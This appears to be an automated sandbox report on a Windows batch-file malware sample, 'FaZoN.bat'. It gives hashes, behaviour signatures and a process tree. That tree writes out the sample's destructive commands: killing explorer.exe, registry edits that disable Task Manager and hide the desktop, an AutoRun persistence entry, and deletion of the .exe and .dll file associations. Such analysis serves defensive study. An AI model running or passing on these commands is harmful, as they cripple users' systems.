Analysis

  • max time kernel
    45s
  • max time network
    192s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags
    arch:x64
    arch:x86
    image:win10v2004-20240226-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    02-03-2024 20:26

General

  • Target

    TrashMalwares-main/FaZoN.bat

  • Size

    1KB

  • MD5

    2a2c2cca38f2e34ee666d4534834dcbb

  • SHA1

    8ffa496f4e56c6406f8f965059483125966c6fdd

  • SHA256

    6397c16efa9b0ff4732002d37a948192b1df49c0c2c927806622fa59d3ac1b46

  • SHA512

    e05a896d8bcad42c04b69c14be3b625d1f586049b2a5925d08bae47f47429b44669904e22daaf94c003bbd697957bddf6067e1aaccc9dd4cb7c607a1d78686d0

Score
8/10

Malware Config

Signatures

  • Disables Task Manager via registry modification
  • Modifies Installed Components in the registry 2 TTPs 9 IoCs
  • Enumerates connected drives 3 TTPs 8 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 8 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\FaZoN.bat"
    1⤵
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4992
    • C:\Windows\system32\msg.exe
      msg * Gosha created by GGmex your computer infected
      2⤵
        PID:3600
      • C:\Windows\system32\taskkill.exe
        taskkill /f /im explorer.exe
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2876
      • C:\Windows\system32\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d C:\Windows\explorer.exe /f
        2⤵
        • Modifies registry key
        PID:1720
      • C:\Windows\system32\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        2⤵
        • Modifies registry key
        PID:624
      • C:\Windows\system32\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
        2⤵
        • Modifies registry key
        PID:4636
      • C:\Windows\explorer.exe
        explorer.exe
        2⤵
        • Modifies Installed Components in the registry
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:3552
      • C:\Windows\system32\msg.exe
        msg * Your desktop has been crashed
        2⤵
        PID:3536
      • C:\Windows\system32\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        2⤵
        • Modifies registry key
        PID:2620
      • C:\Windows\system32\msg.exe
        msg * Your windows infected by gosha :)
        2⤵
        PID:2940
      • C:\Windows\system32\reg.exe
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\syste m32\gosha.bat" /f
        2⤵
        PID:3904
      • C:\Windows\system32\msg.exe
        msg * Deleted files
        2⤵
        PID:2024
      • C:\Windows\system32\msg.exe
        msg * Your system has been removed...
        2⤵
        PID:1004
      • C:\Windows\system32\msg.exe
        msg * Click OK
        2⤵
        PID:1656
      • C:\Windows\system32\cmd.exe
        cmd
        2⤵
        PID:2628
      • C:\Windows\system32\reg.exe
        reg delete HKCR/.exe
        2⤵
        PID:1976
      • C:\Windows\system32\reg.exe
        reg delete HKCR/.dll
        2⤵
        PID:3864
      • C:\Windows\system32\reg.exe
        reg delete HKCR/*
        2⤵
        PID:4852
      • C:\Windows\system32\cmd.exe
        cmd
        2⤵
        PID:776
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:2796
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Modifies Installed Components in the registry
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2728
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1556
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Modifies Installed Components in the registry
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2228
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:444
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:3384
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Modifies Installed Components in the registry
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious use of SendNotifyMessage
    PID:3316
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:4164
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Modifies Installed Components in the registry
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious use of SendNotifyMessage
    PID:3568
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:468
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:2264
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Modifies Installed Components in the registry
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:3920
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:3804
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:1556
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Modifies Installed Components in the registry
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:3404
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:3396
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Modifies Installed Components in the registry
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:4396
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2796
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:3616
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Modifies Installed Components in the registry
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:2516
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:3980
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:3632
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:684
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:3660
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:3668
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:3396
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:4332
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:3804
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:3316
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:1196
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:4564
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:3616
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:4452
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:3972
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:4852
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:3480
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:3416
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:4472
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:3112
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:4496
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:1520
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:3932
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:3360
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:4528
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:2552
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:5060
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:3448
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:3536
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:4436
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:2440
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:3480
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:3800
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:3572
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:4564
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:2924
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:1448
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:1284
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:3292
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:392
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:4144
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:4436
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    PID:1460
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:1512
                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                              1⤵
                                                                                                                PID:3760
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:220
                                                                                                                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                  1⤵
                                                                                                                    PID:5044
                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                    1⤵
                                                                                                                      PID:4664
                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                      explorer.exe
                                                                                                                      1⤵
                                                                                                                        PID:4224
                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                        1⤵
                                                                                                                          PID:4440
                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                          1⤵
                                                                                                                            PID:1172
                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                            explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:4052
                                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                              1⤵
                                                                                                                                PID:4232
                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                1⤵
                                                                                                                                  PID:2316
                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                  explorer.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:4836
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                    1⤵
                                                                                                                                      PID:4488
                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                      explorer.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:2400
                                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                        1⤵
                                                                                                                                          PID:2688
                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                          1⤵
                                                                                                                                            PID:1536
                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                            explorer.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:4292
                                                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                              1⤵
                                                                                                                                                PID:4876
                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                1⤵
                                                                                                                                                  PID:4776

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\KERIKBO1\microsoft.windows[1].xml
    Filesize: 96B
    MD5: 974f0adc8b3b7f482be95139c92926e0
    SHA1: 635f5f7b6f1dda58dd4926f1600dce90652da52a
    SHA256: fc71f9b009579b4f8c03f646fca98084ed6133d4f2acc4103ea39c366518c771
    SHA512: 27b57eec2e4da0c23cb6f7e173ac831a039c3c8a76dec063c8b23c2e1d90f2d52dc5916044a1cf09fd235439d28919d31e0eef3870374e682d1f07daac9960b2
  • memory/392-353-0x0000000004E90000-0x0000000004E91000-memory.dmp (Filesize 4KB)
  • memory/1196-149-0x0000000004190000-0x0000000004191000-memory.dmp (Filesize 4KB)
  • memory/1448-330-0x00000000028E0000-0x00000000028E1000-memory.dmp (Filesize 4KB)
  • memory/1520-227-0x0000015271100000-0x0000015271120000-memory.dmp (Filesize 128KB)
  • memory/1520-229-0x0000015271510000-0x0000015271530000-memory.dmp (Filesize 128KB)
  • memory/1520-225-0x0000015271140000-0x0000015271160000-memory.dmp (Filesize 128KB)
  • memory/1556-64-0x00000155DA0E0000-0x00000155DA100000-memory.dmp (Filesize 128KB)
  • memory/1556-60-0x00000155D9B10000-0x00000155D9B30000-memory.dmp (Filesize 128KB)
  • memory/1556-62-0x00000155D9AD0000-0x00000155D9AF0000-memory.dmp (Filesize 128KB)
  • memory/2228-9-0x0000000002FB0000-0x0000000002FB1000-memory.dmp (Filesize 4KB)
  • memory/2264-45-0x00000202F84D0000-0x00000202F84F0000-memory.dmp (Filesize 128KB)
  • memory/2264-43-0x00000202F7DC0000-0x00000202F7DE0000-memory.dmp (Filesize 128KB)
  • memory/2264-40-0x00000202F8100000-0x00000202F8120000-memory.dmp (Filesize 128KB)
  • memory/2440-285-0x0000000002560000-0x0000000002561000-memory.dmp (Filesize 4KB)
  • memory/2516-99-0x0000000002AE0000-0x0000000002AE1000-memory.dmp (Filesize 4KB)
  • memory/2924-317-0x000001E535270000-0x000001E535290000-memory.dmp (Filesize 128KB)
  • memory/2924-315-0x000001E5352B0000-0x000001E5352D0000-memory.dmp (Filesize 128KB)
  • memory/2924-319-0x000001E535880000-0x000001E5358A0000-memory.dmp (Filesize 128KB)
  • memory/3112-217-0x0000000004BD0000-0x0000000004BD1000-memory.dmp (Filesize 4KB)
  • memory/3292-342-0x000001492B980000-0x000001492B9A0000-memory.dmp (Filesize 128KB)
